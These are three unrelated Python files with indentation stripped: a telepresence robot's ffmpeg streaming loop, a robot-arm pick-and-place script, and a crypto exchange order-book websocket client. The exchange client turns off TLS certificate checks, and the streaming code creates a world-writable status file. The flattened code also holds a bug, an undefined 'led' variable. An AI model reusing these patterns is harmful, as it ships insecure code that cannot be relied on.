audioCommandLine = '%s -f alsa -ar %d -ac %d -i hw:%d -f mpegts -codec:a mp2 -b:a 64k -muxdelay 0.01 http://%s:%s/%s/640/480/'\
% (robotSettings.ffmpeg_path, audioRate, robotSettings.mic_channels, audioDevNum, audioHost, audioPort, robotSettings.stream_key)
print(audioCommandLine)
if commandArgs.usb_reset_id != None:
if len(commandArgs.usb_reset_id) == 8:
vendor_id=int(commandArgs.usb_reset_id[0:4], 16)
product_id=int(commandArgs.usb_reset_id[4:], 16)
dev=finddev(idVendor=vendor_id, idProduct=product_id)
dev.reset()
#return subprocess.Popen(shlex.split(audioCommandLine))
return runAndMonitor("audio", shlex.split(audioCommandLine))
def rotationOption():
if robotSettings.rotate180:
return "-vf transpose=2,transpose=2"
else:
return ""
def onCommandToRobot(*args):
global robotID
if len(args) > 0 and 'robot_id' in args[0] and args[0]['robot_id'] == robotID:
commandMessage = args[0]
print('command for this robot received:', commandMessage)
command = commandMessage['command']
if command == 'VIDOFF':
print('disabling camera capture process')
print("args", args)
robotSettings.camera_enabled = False
os.system("killall ffmpeg")
if command == 'VIDON':
if robotSettings.camera_enabled:
print('enabling camera capture process')
print("args", args)
robotSettings.camera_enabled = True
sys.stdout.flush()
def onConnection(*args):
print('connection:', args)
sys.stdout.flush()
def onRobotSettingsChanged(*args):
print('---------------------------------------')
print('set message recieved:', args)
refreshFromOnlineSettings()
def killallFFMPEGIn30Seconds():
time.sleep(30)
os.system("killall ffmpeg")
#todo, this needs to work differently. likely the configuration will be json and pull in stuff from command line rather than the other way around.
def overrideSettings(commandArgs, onlineSettings):
global resolutionChanged
global currentXres
global currentYres
resolutionChanged = False
c = copy.deepcopy(commandArgs)
print("onlineSettings:", onlineSettings)
if 'mic_enabled' in onlineSettings:
c.mic_enabled = onlineSettings['mic_enabled']
if 'xres' in onlineSettings:
if currentXres != onlineSettings['xres']:
resolutionChanged = True
c.xres = onlineSettings['xres']
currentXres = onlineSettings['xres']
if 'yres' in onlineSettings:
if currentYres != onlineSettings['yres']:
resolutionChanged = True
c.yres = onlineSettings['yres']
currentYres = onlineSettings['yres']
print("onlineSettings['mic_enabled']:", onlineSettings['mic_enabled'])
return c
def refreshFromOnlineSettings():
global robotSettings
global resolutionChanged
print("refreshing from online settings")
#onlineSettings = getOnlineRobotSettings(robotID)
#robotSettings = overrideSettings(commandArgs, onlineSettings)
robotSettings = commandArgs
if not robotSettings.mic_enabled:
print("KILLING**********************")
if audioProcess is not None:
print("KILLING**********************")
audioProcess.kill()
if resolutionChanged:
print("KILLING VIDEO DUE TO RESOLUTION CHANGE**********************")
if videoProcess is not None:
print("KILLING**********************")
videoProcess.kill()
else:
print("NOT KILLING***********************")
def checkForStuckProcesses():
global lastCharCount
global videoProcess
if lastCharCount is not None:
if robotSettings.camera_enabled:
videoInfoRate = charCount['video'] - lastCharCount['video']
print("video info rate:", videoInfoRate)
if abs(videoInfoRate) < 10:
print("video process has stopped outputting info")
print("KILLING VIDEO PROCESS")
videoProcess.kill()
if robotSettings.mic_enabled and robotSettings.protocol == 'jsmpeg':
audioInfoRate = charCount['audio'] - lastCharCount['audio']
print("audio info rate:", audioInfoRate)
if abs(audioInfoRate) < 10:
print("audio process has stopped outputting info")
print("KILLING AUDIO PROCESS")
audioProcess.kill()
print("ffmpeg output character count:", charCount)
lastCharCount = copy.deepcopy(charCount)
def startRTCffmpeg(videoEndpoint, SSRCV, audioEndpoint, SSRCA):
# set brightness
if (robotSettings.brightness is not None):
print("brightness")
os.system("v4l2-ctl -c brightness={brightness}".format(brightness=robotSettings.brightness))
# set contrast
if (robotSettings.contrast is not None):
print("contrast")
os.system("v4l2-ctl -c contrast={contrast}".format(contrast=robotSettings.contrast))
# set saturation
if (robotSettings.saturation is not None):
print("saturation")
os.system("v4l2-ctl -c saturation={saturation}".format(saturation=robotSettings.saturation))
audioDevNum = robotSettings.audio_device_number
if robotSettings.audio_device_name is not None:
audioDevNum = audio_util.getAudioRecordingDeviceByName(robotSettings.audio_device_name)
if robotSettings.protocol == 'video/VP8':
#ffmpeg -h encoder=libvpx
videoParameters = '-c:v libvpx \
{VPXextraParams} \
-tune psnr \
-deadline realtime \
-quality realtime \
-cpu-used 16 \
-pix_fmt yuv420p \
-b:v {kbps}k \
-preset ultrafast \
-map 0:v:0'\
.format(kbps=robotSettings.kbps,
VPXextraParams=robotSettings.VPXextraParams)
else:
#ffmpeg -h encoder=libx264
videoParameters = '-c:v libx264 \
-pix_fmt yuv420p \
-vsync 2 \
-x264-params "{h264codecParams}" \
-b:v {kbps}k -minrate {kbps}k -maxrate {kbps}k -bufsize 2M \
-preset {h264preset} \
{h264extraParams}\
-g 50 \
-map 0:v:0'\
.format(kbps=robotSettings.kbps,
h264codecParams=robotSettings.h264codecParams,
h264preset=robotSettings.h264preset,
h264extraParams=robotSettings.h264extraParams)
videoCommandLine = '{ffmpeg_path} \
-f v4l2 -video_size {xres}x{yres} -r {framerate} -i /dev/video{video_device_number} {rotation_option} \
-f alsa -i hw:{audio_device_number} \
{video} \
-c:a libopus \
-b:a {kbpsAudio}k \
-async 1 \
-preset ultrafast \
-map 1:a:0 \
-f tee "[select=a:f=rtp:ssrc={SSRCA}:payload_type=100]rtp://{audio_host}:{audio_port}|[select=v:f=rtp:ssrc={SSRCV}:payload_type=101]rtp://{video_host}:{video_port}"'\
.format(ffmpeg_path=robotSettings.ffmpeg_path,
video_device_number=robotSettings.video_device_number,
xres=robotSettings.xres,
yres=robotSettings.yres,
framerate=robotSettings.framerate,
audio_device_number=audioDevNum,
rotation_option=rotationOption(),
video=videoParameters,
kbpsAudio=robotSettings.kbps_audio,
audio_host=audioEndpoint['localIp'], audio_port=audioEndpoint['localPort'],
video_host=videoEndpoint['localIp'], video_port=videoEndpoint['localPort'],
SSRCA=SSRCA, SSRCV=SSRCV)
print(videoCommandLine)
return runAndMonitor("video", shlex.split(videoCommandLine))
#return subprocess.Popen(shlex.split(videoCommandLine))
def startRTCvideo():
global websocketSFU
global videoProcess
print("RTC Codec: ", robotSettings.protocol)
# convert camera_id to robot
robotID = str(int(commandArgs.camera_id) - int(100))
videoSSRC = int(random.randint(1000,9999))
audioSSRC = int(random.randint(1000,9999))
peerID = str(random.randint(100000,999999))
videoSFU = getVideoSFU()
print("robotID: ", robotID)
print("videoSSRC: ", videoSSRC)
print("audioSSRC: ", audioSSRC)
print("SFU", videoSFU)
if websocketSFU:
# close if open to dump the old transports
websocketSFU.close()
websocketSFU = rtc_signalling.SFUClient('wss://'+str(videoSFU['host'])+':'+str(videoSFU['port'])\
+'/?roomId='+robotID+'&peerId=p:robot_'+peerID, protocols=['protoo'])
websocketSFU.init(robotSettings.stream_key,
robotSettings.protocol,
videoSSRC,
audioSSRC)
websocketSFU.connect()
websocketSFU.getRouterRtpCapabilities() #n/a producer
websocketSFU.requestPlainTransportVideo()
websocketSFU.requestPlainTransportAudio()
# wait for endpoint results
while websocketSFU.videoEndpoint == False:
pass
while websocketSFU.audioEndpoint == False:
pass
videoProcess = startRTCffmpeg(websocketSFU.videoEndpoint, videoSSRC, websocketSFU.audioEndpoint, audioSSRC)
return
def checkVideoDevices():
import os.path
if os.path.exists("/dev/video" + str(robotSettings.video_device_number)):
#sayInfo("video device " + str(robotSettings.video_device_number) + " exists")
pass
else:
sayInfo("video device " + str(robotSettings.video_device_number) + " is missing")
def main():
global robotID
global audioProcess
global videoProcess
numVideoRestarts = 0
numAudioRestarts = 0
count = 0
# overrides command line parameters using config file
print("args on command line:", commandArgs)
print("camera id:", commandArgs.camera_id)
refreshFromOnlineSettings()
print("args after loading from server:", robotSettings)
if robotSettings.protocol != 'jsmpeg':
robotSettings.protocol = 'video/'+str(robotSettings.protocol)
robot_util.sendCameraAliveMessage(apiServer, commandArgs.camera_id, commandArgs.stream_key)
sys.stdout.flush()
checkVideoDevices()
if robotSettings.protocol != 'jsmpeg':
# RTC
startRTCvideo()
else:
# jsmpeg
if robotSettings.camera_enabled:
if not commandArgs.dry_run:
videoProcess = startVideoCaptureLinux()
else:
videoProcess = DummyProcess()
if robotSettings.mic_enabled:
if not commandArgs.dry_run:
audioProcess = startAudioCaptureLinux()
if commandArgs.audio_restart_enabled:
_thread.start_new_thread(killallFFMPEGIn30Seconds, ())
#appServerSocketIO.emit('send_video_process_start_event', {'camera_id': commandArgs.camera_id})
else:
audioProcess = DummyProcess()
# loop forever and monitor status of ffmpeg processes
while True:
print("-----------------" + str(count) + "-----------------")
#todo: start using this again
#appServerSocketIO.wait(seconds=1)
time.sleep(1)
# todo jsmpeg: note about the following ffmpeg_process_exists is not technically true, but need to update
# server code to check for send_video_process_exists if you want to set it technically accurate
# because the process doesn't always exist, like when the relay is not started yet.
# send status to server
######appServerSocketIO.emit('send_video_status', {'send_video_process_exists': True,
###### 'ffmpeg_process_exists': True,
###### 'camera_id':commandArgs.camera_id})
if numVideoRestarts > 20:
if commandArgs.restart_on_video_fail:
print("rebooting in 20 seconds because of too many restarts. probably lost connection to camera")
time.sleep(20)
os.system("sudo reboot")
if count % 20 == 0:
try:
with os.fdopen(os.open('/tmp/send_video_summary.txt', os.O_WRONLY | os.O_CREAT, 0o777), 'w') as statusFile:
statusFile.write("time" + str(datetime.datetime.now()) + "\n")
statusFile.write("video process poll " + str(videoProcess.poll()) + " pid " + str(videoProcess.pid) + " restarts " + str(numVideoRestarts) + " \n")
statusFile.write("audio process poll " + str(audioProcess.poll()) + " pid " + str(audioProcess.pid) + " restarts " + str(numAudioRestarts) + " \n")
print("status file written")
sys.stdout.flush()
except:
print("status file could not be written")
traceback.print_exc()
sys.stdout.flush()
if (count % robot_util.KeepAlivePeriod) == 0:
print("")
print("sending camera alive message")
print("")
robot_util.sendCameraAliveMessage(apiServer,
commandArgs.camera_id,
robotSettings.stream_key)
if (count % 2) == 0:
checkForStuckProcesses()
# poll when jsmpeg and rtc
if robotSettings.camera_enabled and videoProcess:
print("video process poll", videoProcess.poll(), "pid", videoProcess.pid, "restarts", numVideoRestarts)
# restart video if needed
if videoProcess.poll() != None:
randomSleep()
if robotSettings.protocol != 'jsmpeg':
print("RESTART RTC")
startRTCvideo()
else:
#jsmpeg restart
videoProcess = startVideoCaptureLinux()
numVideoRestarts += 1
else:
print("video process poll: camera_enabled is false")
# only poll when jsmpeg; rtc has no audio process
if robotSettings.mic_enabled and robotSettings.protocol == 'jsmpeg':
if audioProcess is None:
print("audio process poll: audioProcess object is None")
else:
print("audio process poll", audioProcess.poll(), "pid", audioProcess.pid, "restarts", numAudioRestarts)
# restart audio if needed
if (audioProcess is None) or (audioProcess.poll() != None):
randomSleep()
audioProcess = startAudioCaptureLinux()
#time.sleep(30)
#appServerSocketIO.emit('send_video_process_start_event', {'camera_id': commandArgs.camera_id})
numAudioRestarts += 1
else:
print("audio process poll: mic_enabled is false")
count += 1
main()
|
tcp_pin.py | import socket
import time
import math
import rtde_control
import rtde_receive
import cv2
import pyrealsense2
import threading
import RPi.GPIO as GPIO
switch = 18
pump = 7
GPIO.setmode(GPIO.BOARD)
GPIO.setup(switch, GPIO.IN,pull_up_down=GPIO.PUD_UP)
GPIO.setup(pump, GPIO.OUT)
#####################################################
def movRobot(tcpPose,v, a, asnc):
rtde_c.moveL(tcpPose[0], v, a, False)
rtde_c.moveL(tcpPose[1], v, a, True)
while ( not GPIO.input(18)):
print("not pressed")
rtde_c.moveL(tcpPose[2], v, a, False)
rtde_c.moveL(tcpPose[3], v, a, False)
rtde_c.moveL(tcpPose[4], v, a, False)
print("Turn Off Pump")
# time.sleep(2)
rtde_c.moveL(tcpPose[5], v, a, False)
rtde_c.moveL(tcpPose[6], v, a, False)
if(GPIO.input(18)):
print("Button Pressed")
GPIO.output(led,GPIO.HIGH)
else:
print("not pressed")
GPIO.output(led,GPIO.LOW)
def movRobotPath(tcpPose, asnc):
rtde_c.moveL(tcpPose, asnc)
print("MOVING TO POSITION")
def BSFunction(tcpPose):
rtde_c.moveL(tcpPose, False)
rtde_c.moveL(tcpPose, True)
def stopRobt():
rtde_c.stopJ(2.0)
def getForce():
rst = rtde_c.zeroFtSensor()
print(rst, "=== Force Reset")
for i in range(5):
contact = rtde_r.getActualTCPForce()
print("Current Force Values ", contact)
# print("Forces #",i," ->",contact,rtde_c.isSteady())
time.sleep(0.5)
# while (contact[2] > 20):
# contact = rtde_r.getActualTCPForce()
# stopRobt()
#####################################################
# UR COMM CODE
HOST = "10.0.0.6" # The remote host
PORT = 30002
rtde_c = rtde_control.RTDEControlInterface(HOST)
rtde_r = rtde_receive.RTDEReceiveInterface(HOST)
###################################################
v = 2
a = 0.3
blend =0.00
print("Connection: ",rtde_c.isConnected())
# coordinates
move_joints_1 = [-0.5,-0.22,0.3,2.89,-1.29,0.126]
move_joints_2 = [-0.5,-0.22,0.4,2.89,-1.29,0.126]
drop = [ 0.145, -0.623, 0.0479, 3.09, 0.0169, -0.041]
placing = [ 0.116, -0.559, 0.4300, 3.10, 0.0169, -0.050]
# placing1 = [-0.252, -0.511, 0.4300, 2.95, -0.9491, -0.063]
home = [-0.537, -0.193, 0.4300, 2.40, -2.0000, -0.079] # We might not need this
marker1 = [-0.695, -0.215, 0.1416, 2.34, -2.1194, -0.041]
marker2 = [-0.698, -0.105, 0.1351, 2.16, -2.2841, -0.060]
marker3 = [-0.703, -0.023, 0.154, 1.95, -2.48, -0.02]
marker4 = [-0.693, -0.128, 0.141, 1.77, -2.63, -0.00]
package1 = [-0.693, -0.128, 0.141, 1.77, -2.63, -0.00]
package2 = [-0.645, 0.136, 0.096, 1.21, -2.94, 0.03]
package3 = [-0.425, 0.130, 0.096, 0.93, -2.96, 0.02]
# marker5 = [-0.678, -0.218, 0.1440, 1.56, -2.6799, -0.170]
# marker6 = [-0.582, -0.229, 0.1388, 1.47, -2.7888, -0.060]
# marker7 = [-0.581, -0.135, 0.1331, 1.65, -2.6666, -0.089]
# marker8 = [-0.695, -0.215, 0.1416, 2.34, -2.1194, -0.041]
# marker9 = [-0.695, -0.215, 0.1416, 2.34, -2.1194, -0.041]
coordinates = []
# MUST APPEND IN ORDER OF PATH TRAVELLING
coordinates.append(home) # 0
coordinates.append(package1) # 1
coordinates.append(home) # 2
coordinates.append(placing) # 3
coordinates.append(drop) # 4
coordinates.append(placing) # 5
coordinates.append(home) # 6
coordinates.append(package2)
coordinates.append(home)
coordinates.append(placing)
coordinates.append(drop)
coordinates.append(placing)
coordinates.append(home)
coordinates.append(package3)
coordinates.append(home)
coordinates.append(placing)
coordinates.append(drop)
coordinates.append(placing)
coordinates.append(home)
# coordinates.append(home)
# coordinates.append(marker2)
# coordinates.append(home)
# coordinates.append(placing)
# coordinates.append(drop)
# coordinates.append(home)
# coordinates.append(marker3)
# coordinates.append(home)
# coordinates.append(placing)
# coordinates.append(drop)
# coordinates.append(home)
# coordinates.append(marker4)
# coordinates.append(home)
# coordinates.append(placing)
# coordinates.append(drop)
# coordinates.append(home)
# coordinates.append(marker5)
# coordinates.append(home)
# coordinates.append(placing)
# coordinates.append(drop)
# coordinates.append(home)
# coordinates.append(marker6)
# coordinates.append(home)
# coordinates.append(placing)
# coordinates.append(drop)
# coordinates.append(home)
# coordinates.append(marker7)
# coordinates.append(home)
# coordinates.append(placing)
# coordinates.append(drop)
# coordinates.append(move_joints_1)
# coordinates.append(move_joints_2)
# # coordinates.append(placing1)
# coordinates.append(placing)
# coordinates.append(drop)
# append velocity, acceleration, blend to each coordinate vector
# for waypoints in coordinates:
# waypoints.append(v)
# waypoints.append(a)
# waypoints.append(blend)
# move_joints_1.append(v)
# move_joints_1.append(a)
# move_joints_1.append(0.0)
# move_joints_2.append(v)
# move_joints_2.append(a)
# move_joints_2.append(0.0)
# drop.append(v)
# drop.append(a)
# drop.append(0.0)
# placing.append(v)
# placing.append(a)
# placing.append(0.0)
# home.append(v)
# home.append(a)
# home.append(0.0)
###########################
# Creates path by packing in order of coordinates
path = []
for waypoints in coordinates:
path.append(waypoints)
path.append(home)
# # path.append(placing1)
# path.append(home)
# combined.append(move_joints_1)
# combined.append(move_joints_2)
# combined.append(placing)
# combined.append(drop)
# combined.append(home)
# runs = rtde_c.moveL(move_joints_2,v,a,False)
# Spawning thread for movement
move = threading.Thread(target = movRobot, args = (coordinates,v,a,False))
move.start()
# for i in range(9):
# movePath = threading.Thread(target = movRobotPath, args = (path,False))
# movePath.start()
# movePath.join()
# FREE MODE
# rtde_c.teachMode()
# time.sleep(300)
# EndFreedrive Mode
rtde_c.endTeachMode()
time.sleep(5)
# print("5 seconds done - getting force")
# force = threading.Thread(target = getForce)
# force.start()
# stop = threading.Thread(target = stopRobt)
# stop.start()
# tcp = rtde_r.getTargetTCPPose()
# print ("tcp",tcp)
# rtde_c.stopJ(2.0)
###################################################
### EVERYTHING BELOW DOES NOT WORK OR IS SUPPOSE TO INTEGRATE WITH DEPT
# while True:
# #show distance for a specific point
# # (X,Y)
# ret,depth_frame,color_frame = dc.get_frame()
# cv2.circle(color_frame, point,4,(0,0,255))
# # [y] [x] when using cv2
# distance = depth_frame[point[1],[point[0]]]
# cv2.putText(color_frame,"{}mm".format(distance),(point[0],point[1]-20),cv2.FONT_HERSHEY_PLAIN,2,(0,255,0),2)
# cv2.imshow("depth frame",depth_frame)
# cv2.imshow("Color frame", color_frame )
# cv2.waitKey(1)
# while (runs):
#tcp = rtde_r.getTargetTCPPose()
#print ("tcp",tcp)
# direction = [0.00,0.00,1.001,0.001,0.001,1.001]
# contact = rtde_r.getActualTCPForce()
#print ("Force",contact)
#print ("Force",contact[2])
#if((contact[2] < -10 ) or (contact[2] > 30 ) ):
# runs = False
# rtde_c.stopJ(2.0)
# time.sleep(5)
#actual_q = rtde_r.getActualQ()
#print ("Move Joint Angles:",actual_q)
|
microprice.py | #!/usr/bin/env python3
import ssl
import os
import sys
import optparse
import websocket
from threading import Thread
import logging
import json
from enum import Enum
from random import randint
import datetime as dt
import time
from math import fabs
import socket
import numpy as np
from numpy_ringbuffer import RingBuffer
WS_TIMEOUT = 5
BINANCE_URL = "wss://stream.binance.com:9443/ws"
#BINANCE_SNAP_URL = "https://www.binance.com/api/v1/depth?limit=1000&"
BITFINEX_URL = "wss://api.bitfinex.com/ws/2"
GDAX_QA_URL = "wss://ws-feed-public.sandbox.gdax.com"
GDAX_URL = "wss://ws-feed.gdax.com"
LOG_FORMAT = '%(asctime)s|%(name)-8s|%(thread)-6d|%(levelname)-6s|%(message)s'
LOG_FOLDER = "c:/temp"
class log_formatter(logging.Formatter):
converter=dt.datetime.fromtimestamp
def formatTime(self, record, datefmt=None):
ct = self.converter(record.created)
if datefmt:
s = ct.strftime(datefmt)
else:
t = ct.strftime("%Y-%m-%d %H:%M:%S")
s = "%s,%03d" % (t, record.msecs)
return s
class channel_state(Enum):
NONE = 0
SUBSCRIBING = 1
SUBSCRIBED = 2
UNSUBSCRIBING = 3
class market(Enum):
FINEX = 0
GDAX = 1
BINANCE = 2
class channel_data:
def __init__(self, name):
self.name_ = name
self.id_ = 0
self.status_ = channel_state.NONE
class price_channel(channel_data):
def __init__(self, name, symbol):
super().__init__(name)
self.symbol_ = symbol
class price_level:
def __init__(self, price, qty, orders):
self.price_ = price
self.qty_ = qty
self.orders_ = orders
def __str__(self):
return "%.2f @ %.2f" % (self.qty_, self.price_)
def update_side(arr, price, qty, orders):
for i in range(0, len(arr)):
if arr[i].price_ == price:
if orders == 0: # removal
arr.pop(i)
return
else:
arr[i] = price_level(price, qty, orders)
return
class order_book:
def __init__(self):
self.bids_ = []
self.asks_ = []
self.synced_ = False
self.open_ = 0.0
self.low_ = 0.0
self.high_ = 0.0
self.last_traded_ = RingBuffer(100, dtype=np.float)
def is_synced(self):
return self.synced_
def top(self):
return [self.bids_[0] if len(self.bids_) > 0 else [],
self.asks_[0] if len(self.asks_) > 0 else []]
def sanity_check(self):
if len(self.bids_) > 0:
for i in self.bids_:
assert i.qty_ > 0
if len(self.asks_) > 0:
for i in self.asks_:
assert i.qty_ > 0
if len(self.bids_) > 0 and len(self.asks_) > 0:
assert self.bids_[0].price_ < self.asks_[0].price_
return True
class finex_order_book(order_book):
def __init__(self):
super().__init__()
def update_internal(self, data):
assert len(data) == 3
if data[2] > 0: # bids
update_side(self.bids_, data[0], data[2], data[1])
else: # ask
update_side(self.asks_, data[0], fabs(data[2]), data[1])
def update(self, data):
if isinstance(data[0], list):
for d in data[0]:
self.update_internal(d)
else:
self.update_internal(data)
assert self.sanity_check()
def snapshot(self, data):
self.bids_ = []
self.asks_ = []
for i in data:
assert len(i) == 3
if i[2] > 0: # bids
self.bids_.append(price_level(i[0], i[2], i[1]))
else: # ask
self.asks_.append(price_level(i[0], fabs(i[2]), i[1]))
self.synced_ = True
assert self.sanity_check()
class gdax_order_book(order_book):
def __init__(self):
super().__init__()
def update(self, data):
for d in data:
qty = float(d[2])
if d[0] == 'buy':
update_side(self.bids_, float(d[1]), qty, 1 if qty != 0 else 0)
else:
update_side(self.asks_, float(d[1]), qty, 1 if qty != 0 else 0)
assert self.sanity_check()
def snapshot(self, bids, asks):
self.bids_ = [ price_level(float(l[0]), float(l[1]), 1) for l in bids ]
self.asks_ = [ price_level(float(l[0]), float(l[1]), 1) for l in asks ]
self.synced_ = True
assert self.sanity_check()
def trade(self, data):
self.open_ = float(data['open_24h'])
self.low_ = float(data['low_24h'])
self.high_ = float(data['high_24h'])
self.last_traded_.append(float(data['price']))
class binance_order_book(order_book):
def __init__(self):
super().__init__()
def update(self, data):
self.bids_ = [ price_level(float(level[0]), float(level[1]), 1) for level in data['bids'] ]
self.asks_ = [ price_level(float(level[0]), float(level[1]), 1) for level in data['asks'] ]
self.synced_ = True
assert self.sanity_check()
class instrument:
def __init__(self, id, mdsymbols):
self.id_ = id
self.mdsymbols_ = mdsymbols
self.order_books_ = {}
self.order_books_[market.FINEX] = finex_order_book()
self.order_books_[market.GDAX] = gdax_order_book()
self.order_books_[market.BINANCE] = binance_order_book()
def is_active(self, market):
return market in self.mdsymbols_
def id(self):
return self.id_
def mdsymbol(self, market):
return self.mdsymbols_[market]
def bids(self, market):
return self.order_books_[market].bids_
def asks(self, market):
return self.order_books_[market].asks_
def top(self, market):
return self.order_books_[market].top()
def order_book(self, market):
return self.order_books_[market]
def average_trade(self, market):
o = self.order_book(market)
return np.median(o.last_traded_) if len(o.last_traded_) > 0 else 0.0
def wpx(self, market):
if len(self.bids(market)) > 0 and len(self.asks(market)) > 0:
return (self.bids(market)[0].price_ * self.asks(market)[0].qty_ + self.asks(market)[0].price_ * self.bids(market)[0].qty_) \
/ (self.bids(market)[0].qty_ + self.asks(market)[0].qty_)
else:
return 0.0
def wpx5(self, market):
if len(self.bids(market)) < 5 or len(self.asks(market)) < 5:
return 0.0
a = 0.0
b = 0.0
for i in range(0, 5):
bl = self.bids(market)[i]
al = self.asks(market)[i]
a += bl.price_ * al.qty_ + al.price_ * bl.qty_
b += bl.qty_ + al.qty_
return a / b
def to_string(self, market):
return 'wpx: %.4f wpx5: %.4f traded: %s (%s - %s)' \
% (self.wpx(market), self.wpx5(market), self.average_trade(market), self.top(market)[0], self.top(market)[1])
class binance:
def __init__(self, url, products):
self.market_ = market.BINANCE
self.uri_ = url
self.stop_ = False
self.cid_ = randint(100, 2000)
self.sockets_ = []
self.instruments_ = {}
for i in products:
if i.is_active(self.market_):
self.instruments_[i.mdsymbol(self.market_)] = i
self.logger_ = logging.getLogger('binance')
self.logger_.setLevel(logging.INFO)
def run(self):
def run_internal():
self.connect()
self.listen()
self.thread_ = Thread(target=run_internal)
self.thread_.start()
def stop(self):
self.stop_ = True
if self.thread_:
self.thread_.join()
for item in self.sockets_:
item[0].close()
def connect(self):
for k,i in self.instruments_.items():
url = "%s/%s@depth5" % (self.uri_, i.mdsymbol(self.market_))
self.logger_.info("connecting: %s" % url)
ws = websocket.create_connection(url, \
timeout=WS_TIMEOUT, \
sslopt={"cert_reqs": ssl.CERT_NONE }, \
sockopt=((socket.IPPROTO_TCP, socket.TCP_NODELAY, 1),))
self.sockets_.append([ws, i])
self.handle_connected(ws)
def listen(self):
while not self.stop_:
for item in self.sockets_:
try:
msg = item[0].recv()
data = json.loads(msg)
except json.JSONDecodeError:
next
else:
self.handle_partial_book(item[1], data)
def handle_partial_book(self, ins, data):
self.logger_.debug("received %s" % data)
ins.order_book(self.market_).update(data)
self.logger_.debug("price update on %s" % ins.to_string(self.market_))
def handle_connected(self, ws):
self.logger_.info("connected")
class gdax:
def __init__(self, url, products):
self.market_ = market.GDAX
self.uri_ = url
self.stop_ = False
self.ws_ = None
self.instruments_ = {}
for i in products:
if i.is_active(self.market_):
self.instruments_[i.mdsymbol(self.market_)] = i
self.logger_ = logging.getLogger('gdax')
self.logger_.setLevel(logging.INFO)
def run(self):
def run_internal():
self.connect()
self.listen()
self.thread_ = Thread(target=run_internal)
self.thread_.start()
def stop(self):
for k,v in self.instruments_.items():
self.unsubscribe_price(self.ws_, v)
self.stop_ = True
if self.thread_:
self.thread_.join()
self.ws_.close()
def connect(self):
self.logger_.info("connecting: %s" % self.uri_)
self.ws_ = websocket.create_connection(self.uri_, \
timeout=WS_TIMEOUT, \
sslopt={"cert_reqs": ssl.CERT_NONE }, \
sockopt=((socket.IPPROTO_TCP, socket.TCP_NODELAY, 1),))
self.handle_connected(self.ws_)
def listen(self):
ws = self.ws_
while not self.stop_:
try:
msg = ws.recv()
data = json.loads(msg)
except json.JSONDecodeError:
next
else:
t = data['type']
if t == 'error':
self.handle_error(ws, data)
elif t == 'subscriptions':
self.handle_subscription(ws, data)
elif t == 'heartbeat':
self.handle_heartbeat(ws, data)
elif t == 'snapshot':
self.handle_snapshot(ws, data)
elif t == 'l2update':
self.handle_l2update(ws, data)
elif t == 'ticker':
self.handle_ticker(ws, data)
def get_instrument(self, id):
if not id in self.instruments_:
raise Exception("Unexpected instrument: %s in snap" % id)
return self.instruments_[id]
def handle_ticker(self, ws, data):
self.logger_.debug("received ticker %s" % data)
ins = self.get_instrument(data['product_id'])
ins.order_book(self.market_).trade(data)
def handle_heartbeat(self, ws, data):
self.logger_.debug("received hearbeat for %s seq: %s time: %s" % (data['product_id'], data['sequence'], data['time']))
id = data['product_id']
if not id in self.instruments_:
raise Exception("Unexpected instrument: %s in snap" % id)
# ins = self.instruments_[id]
# ins.last_update_ = data['time']
# ins.sequenuce_ = data['sequence']
def handle_error(self, ws, data):
self.logger_.error("error msg received: %s" % data)
def handle_snapshot(self, ws, data):
self.logger_.debug("received snap %s" % data)
id = data['product_id']
if not id in self.instruments_:
raise Exception("Unexpected instrument: %s in snap" % id)
ins = self.instruments_[id]
ins.order_book(self.market_).snapshot(data['bids'], data['asks'])
def handle_l2update(self, ws, data):
self.logger_.debug("received l2data %s" % data)
ins = self.get_instrument(data['product_id'])
ins.order_book(self.market_).update(data['changes'])
self.logger_.debug("price update on %s" % ins.to_string(self.market_))
def handle_subscription(self, ws, data):
self.logger_.info("received subscription update: %s" % data)
def handle_connected(self, ws):
self.logger_.info("connected")
for k,v in self.instruments_.items():
self.subscribe_price(ws, v)
def subscribe_price(self, ws, ins):
self.logger_.debug("subscribing on %s" % ins.id())
ws.send(json.dumps({ 'type' : 'subscribe', 'product_ids' : ['%s' % ins.mdsymbol(self.market_) ], 'channels' : ['level2', 'heartbeat', 'ticker'] }))
def unsubscribe_price(self, ws, ins):
self.logger_.info("unsubscribe from %s" % ins.id())
ws.send(json.dumps({ 'type' : 'unsubscribe', 'product_ids' : ['%s' % ins.mdsymbol(self.market_) ], 'channels' : ['level2', 'heartbeat', 'ticker'] }))
class finex:
def __init__(self, url, products):
self.market_ = market.FINEX
self.uri_ = url
self.stop_ = False
self.subscription_ = {}
self.channel_map_ = {}
self.cid_ = randint(100, 2000)
self.ws_ = None
self.instruments_ = []
for i in products:
if i.is_active(self.market_):
self.instruments_.append(i)
self.logger_ = logging.getLogger('finex')
self.logger_.setLevel(logging.INFO)
def run(self):
def run_internal():
self.connect()
self.listen()
self.thread_ = Thread(target=run_internal)
self.thread_.start()
def stop(self):
for k,v in self.channel_map_.items():
self.unsubscribe_channel(self.ws_, k)
self.stop_ = True
if self.thread_:
self.thread_.join()
self.ws_.close()
def connect(self):
self.logger_.info("connecting: %s" % self.uri_)
self.ws_ = websocket.create_connection(self.uri_, \
timeout=WS_TIMEOUT, \
sslopt={"cert_reqs": ssl.CERT_NONE }, \
sockopt=((socket.IPPROTO_TCP, socket.TCP_NODELAY, 1),))
self.handle_connected(self.ws_)
def listen(self):
ws = self.ws_
while not self.stop_:
try:
msg = ws.recv()
data = json.loads(msg)
except json.JSONDecodeError:
next
else:
if isinstance(data, dict):
t = data['event']
if t == 'info':
self.handle_info(ws, data)
elif t == 'pong':
self.handle_pong(ws, data)
elif t == 'error':
self.handle_error(ws, data)
elif t == 'subscribed':
self.handle_subscribed(ws, data)
elif t == 'unsubscribed':
self.handle_unsubscribed(ws, data)
else:
if data[1] == 'hb':
self.heartbeat_handler()
else:
self.data_handler(data)
def heartbeat_handler(self):
self.logger_.debug("received heartbeat")
def data_handler(self, data):
self.logger_.debug("received data on channel: %s" % data)
# check channel exists
if not data[0] in self.channel_map_:
self.logger_.error("received data on unknown channel: %s" % data)
return
c = self.channel_map_[data[0]]
if isinstance(c, price_channel):
ins = c.symbol_
o = ins.order_book(self.market_)
if o.is_synced():
o.update(data[1])
else:
o.snapshot(data[1])
self.logger_.debug("price update on %s" % ins.to_string(self.market_))
def handle_connected(self, ws):
self.logger_.info("connected")
for i in self.instruments_:
self.subscribe_price(ws, i)
def subscribe_channel(self, ws, channel, kwargs={}):
d = channel_data(channel)
self.subscription_[channel] = d
d.status_ = channel_state.SUBSCRIBING
self.logger_.debug("subscribing to channel: %s" % d.name_)
